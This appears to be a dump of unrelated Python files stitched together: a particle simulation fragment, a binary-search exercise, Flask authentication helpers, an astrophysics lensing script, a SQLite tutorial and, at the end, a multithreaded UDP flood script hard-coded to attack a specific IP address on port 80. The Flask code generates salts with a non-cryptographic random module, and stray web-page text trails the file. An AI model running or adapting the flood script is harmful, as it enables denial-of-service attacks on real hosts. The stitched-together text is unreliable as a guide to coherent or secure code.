if neighbourList[3].pType == 3 and neighbourList[4].pType == 0:
self.swap(self.x, self.y, neighbourList[4].x, neighbourList[4].y, particleArray)
elif neighbourList[4].pType == 3 and neighbourList[3].pType == 0:
self.swap(self.x, self.y, neighbourList[3].x, neighbourList[3].y, particleArray)
class Oil(Particle):
def __init__(self, x, y, pType = 4, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 1
self.isSolid = False
self.isPowder = False
self.isLiquid = True
self.density = 0.1
class Ice(Particle):
def __init__(self, x, y, pType = 5, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 0
self.isSolid = True
self.isPowder = False
self.isLiquid = False
self.density = 1.0
def particleLogic(self, particleArray, neighbourList):
for particle in neighbourList:
if particle.pType == 3:
if random.randint(0,100) == 0:
self.addParticle(particle.x, particle.y, 5, particleArray)
class Spout(Particle):
def __init__(self, x, y, pType = 6, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 0
self.isSolid = True
self.isPowder = False
self.isLiquid = False
self.density = 1.0
def particleLogic(self, particleArray, neighbourList):
if neighbourList[6].pType == 0:
if random.randint(0,10) == 0:
self.addParticle(self.x, self.y + 1, 3, particleArray)
class Boundary(Particle):
def __init__(self, x, y, pType = 64, movedFlag = False):
Particle.__init__(self, x, y, pType, movedFlag)
#Overridden property variables
self.gravity = 0
self.isSolid = False
self.isPowder = False
self.isLiquid = False
self.density = 1.0
#No need to use update function for air so just ovveride
def update(self, particleArray, neighbourList):
pass
#--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
#Entry point
def main():
root = tk.Tk()
app = MainWindow(root)
if __name__ == "__main__":main()
|
# (BINARY SEARCH PROBLEM) (O(N Log(d)))
# Cow Stalls problem :
# We are given N stalls and C cows place c cows in n stalls such that largest distance between cows
# is minimum
def check(c, positions, n, distance):
count = 1
last_position = positions[0]
for i in range(1, n):
if positions[i] - last_position >= distance:
last_position = positions[i]
count += 1
if count == c:
return True
return False
if __name__ == "__main__":
for _ in range(int(input())):
n, c = map(int, input().split())
positions = []
for i in range(n):
positions.append(int(input()))
positions.sort()
# print(positions)
start = 0
end = positions[n-1] - positions[0]
ans = -1
while start<=end:
mid = start + (end - start)//2
# print("**" + str(mid))
if check(c, positions, n, mid):
ans = mid
start = mid + 1
else:
end = mid - 1
print(ans)
|
# -*- coding: utf-8 -*-
from functools import wraps
import random
import string
import hashlib
import json
import urllib
from flask import session, request, redirect
from models.orm import User
from models.project import project
from zp_web import get_db
__author__ = 'cloudbeer'
def rdm_code(size=8, chars=string.ascii_letters + string.digits + string.punctuation):
return ''.join(random.choice(chars) for x in range(size))
def salt():
return rdm_code(size=16)
def challenge_code():
return rdm_code(size=6, chars=string.digits)
def hash_pwd(pwd, salt):
hs = hashlib.sha256(salt + pwd)
return hs.hexdigest()
def is_name(s):
is_ascii = all(ord(c) < 128 for c in s)
is_ascii_first = not s[0].isdigit()
is_contains_blank = not ' ' in s
return is_ascii and is_ascii_first and is_contains_blank
def str2bool(v):
return v.lower() in ("yes", "true", "t", "1")
def str2val(string, default=None):
"""
ๅฐๅญ็ฌฆไธฒๅๆๅผ
:param string:
:param default:
:return:
"""
for atom in (True, False, None):
if str(atom) == string:
return atom
else:
try:
return int(string)
except ValueError:
if default is not None:
return default
try:
return float(string)
except ValueError:
if default is not None:
return default
return string
class json_res(dict):
def __init__(self, state=False, message=None, **kwargs):
super(json_res, self).__init__(**kwargs)
self.state = state
if message is not None:
self.message = message
def __getattr__(self, name):
if name in self:
return self[name]
else:
return None
def __setattr__(self, name, value):
self[name] = value
def str(self):
return json.dumps(self)
def s_user():
"""
Get the user in session
:return:
"""
if 'user' in session:
return session['user']
elif 'email' in request.cookies and 'emailtoken' in request.cookies:
email = request.cookies['email']
emailtoken = request.cookies['emailtoken']
if email is not None and emailtoken is not None:
db = get_db()
m_user = db.query(User).filter(User.email == email).first()
if m_user is not None and hash_pwd(email, m_user.salt) == emailtoken:
session['user'] = m_user
return m_user
return None
def s_project():
if 'project' in session and session['project'] is not None:
return session['project']
else:
m_project = project()
session['project'] = m_project
return m_project
def login_required_ajax(func):
@wraps(func)
def warpper_ajax(*args, **kwargs):
user = s_user()
if not user:
return json_res(False, message='You must login first.').str()
else:
return func(*args, **kwargs)
return warpper_ajax
def login_required(func):
@wraps(func)
def warpper_mormal(*args, **kwargs):
user = s_user()
if not user:
return redirect('/account/login/?' + urllib.urlencode({'back': request.path}))
else:
return func(*args, **kwargs)
return warpper_mormal
|
#!/usr/bin/env python
#Duncan Campbell
#January 29, 2015
#Yale University
#Calculate auto and cross correlation (SF and quenched) of stellar mass threshold samples
#for central quenching mocks
#load packages
from __future__ import print_function
import numpy as np
import h5py
import matplotlib.pyplot as plt
import custom_utilities as cu
import sys
from halotools_old.mock_observables.two_point_functions import Delta_Sigma
from astropy.io import ascii
from astropy.table import Table
def main():
if len(sys.argv)>1:
catalogue = sys.argv[1]
sm_bin_low = float(sys.argv[2])
sm_bin_high = float(sys.argv[3])
else:
catalogue = 'sm_9.5_s0.2_sfr_c-1.0_250'
sm_bin_low = 10.0
sm_bin_hgih = 10.5
sm_bin = str(sm_bin_low)+'_'+str(sm_bin_high)
#open galaxy mock catalogue
filepath_mock = cu.get_output_path() + 'processed_data/campbell_mocks/'
print('opening mock catalogue:', catalogue+'.hdf5')
#open catalogue
f = h5py.File(filepath_mock+catalogue+'.hdf5', 'r') #open catalogue file
mock = f.get(catalogue)
#open dark matter particle data
filepath_particles = cu.get_output_path() + 'processed_data/Multidark/Bolshoi/particle_catalogues/'
part_catalogue = 'bolshoi_a1.0003_1e6_particles'
f = h5py.File(filepath_particles+part_catalogue+'.hdf5', 'r') #open catalogue file
particle_data = f.get(part_catalogue)
particles = np.zeros((len(particle_data),3))
particles[:,0]=particle_data['x']
particles[:,1]=particle_data['y']
particles[:,2]=particle_data['z']
print("number of mater particles: {0}".format(len(particles)))
#define star forming and quenched samples
LHS = -11.0
blue = (mock['SSFR']>LHS) #indices of blue galaxies
red = (mock['SSFR']<LHS) #indicies of red galaxies
#define radial bins
rbins = np.linspace(-1,np.log10(2),15)
rbins = 10.0**rbins
rbins = np.insert(rbins,0,0.0)
rbin_centers = (rbins[:-1]+rbins[1:])/2.0
period = [250.0,250.0,250.0]
#all galaxies
selection = (mock['Mstar']>sm_bin_low) & (mock['Mstar']<sm_bin_high)
centers = zip(mock['x'][selection],mock['y'][selection],mock['z'][selection])
print("number of galaxies in selection: {0}".format(len(centers)))
delta_sigma_all = Delta_Sigma(centers, particles, rbins, bounds=[-50.0,50.0], normal=[0.0,0.0,1.0],
period=period, N_threads=1)
#quenched galaxies
selection_1 = (red)
selection_2 = (mock['Mstar']>sm_bin_low) & (mock['Mstar']<sm_bin_high)
selection = (selection_1 & selection_2)
centers = zip(mock['x'][selection],mock['y'][selection],mock['z'][selection])
print("number of galaxies in selection: {0}".format(len(centers)))
delta_sigma_red = Delta_Sigma(centers, particles, rbins, bounds=[-50.0,50.0], normal=[0.0,0.0,1.0],
period=period, N_threads=1)
#star forming galaxies
selection_1 = (blue)
selection_2 = (mock['Mstar']>sm_bin_low) & (mock['Mstar']<sm_bin_high)
selection = (selection_1 & selection_2)
centers = zip(mock['x'][selection],mock['y'][selection],mock['z'][selection])
print("number of galaxies in selection: {0}".format(len(centers)))
delta_sigma_blue = Delta_Sigma(centers, particles, rbins, bounds=[-50.0,50.0], normal=[0.0,0.0,1.0],
period=period, N_threads=1)
#units?
N_particles_tot = 2048.0**3.0
N_particles_sub = len(particles)
Mass_particles = 1.35*10.0**8.0
Mass_particle_sub = N_particles_tot/N_particles_sub * Mass_particles
#units #Msol/Mpc^2
delta_sigma_blue = delta_sigma_blue*Mass_particle_sub
delta_sigma_red = delta_sigma_red*Mass_particle_sub
#now convert to Msol/pc^2
delta_sigma_blue = delta_sigma_blue/((10.0**6.0)**2.0)
delta_sigma_red = delta_sigma_red/((10.0**6.0)**2.0)
data_1 = Table([rbin_centers,delta_sigma_all], names=['r', 'DeltaSigma'])
data_2 = Table([rbin_centers,delta_sigma_red], names=['r', 'DeltaSigma'])
data_3 = Table([rbin_centers,delta_sigma_blue], names=['r', 'DeltaSigma'])
savepath = cu.get_output_path() + 'analysis/central_quenching/observables/'
filename_1 = catalogue+'_DeltaSigma_sm_all_'+str(sm_bin)+'.dat'
ascii.write(data_1, savepath+filename_1)
filename_2 = catalogue+'_DeltaSigma_sm_q_'+str(sm_bin)+'.dat'
ascii.write(data_2, savepath+filename_2)
filename_3 = catalogue+'_DeltaSigma_sm_sf_'+str(sm_bin)+'.dat'
ascii.write(data_3, savepath+filename_3)
if __name__ == '__main__':
main() |
#!/usr/bin/env python
""" SQLite with Python - Managing relational SQLite databases """
__author__ = "Saul Moore sm5911@imperial.ac.uk"
__version__ = "0.0.1"
import sqlite3
conn = sqlite3.connect('../Data/test.db') # Create 'test.db'
# To exceute commands, create a 'cursor'
c = conn.cursor()
# Use the cursor to execute the queries
# Use the triple single quote to write queries on several lines
c.execute('''CREATE TABLE Test
(ID INTEGER PRIMARY KEY,
MyVal1 INTEGER,
MYVal2 TEXT)''')
# c.execute('''DROP TABLE test''') # Delete table
# Insert the records, note that because we set the primary key,
# it will auto-increment, therefore, set it to NULL
c.execute('''INSERT INTO Test VALUES
(NULL, 3, 'mickey')''')
c.execute('''INSERT INTO Test VALUES
(NULL, 4, 'mouse')''')
# When you 'commit', all the commands will be executed
conn.commit()
# Now we select the records (row data):
c.execute("SELECT * FROM TEST")
# Access the next record:
print c.fetchone()
print c.fetchone()
# Let's get all the records at once:
c.execute("SELECT * FROM TEST")
print c.fetchall()
# Insert many records at once, create a list of tuples:
manyrecs = [(5, 'goofy'),
(6, 'donald'),
(7, 'duck')]
# Now call 'executemany'
c.executemany('''INSERT INTO test
VALUES(NULL, ?, ?)''', manyrecs)
# and commit
conn.commit()
# Now let's fetch the records, we can use the query as an iterator!
for row in c.execute('SELECT * FROM test'):
print 'Val', row[1], 'Name', row[2]
# Close the connection before exiting
conn.close()
|
import threading
import sys
import os
import time
import socket
import random
import time
def attack():
a=3 #number of minutes
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
start = time.time()
#ip = input("IP Target : ")
#port = input("Port : ")
ip="107.180.95.144"
port=80
os.system("clear")
sent = 0
#change number to how many packets each thread should send.
x=True
while x:
sock.sendto(bytes, (ip,port))
sent = sent + 1
print("Thread "+threading.current_thread().name+"Sent %s packet to %s through port:%s"%(sent,ip,port))
end = time.time()
if(end - start)>a*60:
x=False
nooft=int(input("Enter number of threads"))
#mins=int(input("Enter how long the attack should be"))
mythreads=[]
for i in range(0,nooft):
t= threading.Thread(target=attack, name="t"+str(i))
mythreads.append(t)
t.start()
for i in range(0,nooft):
mythreads[i].join()
print("DONE") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.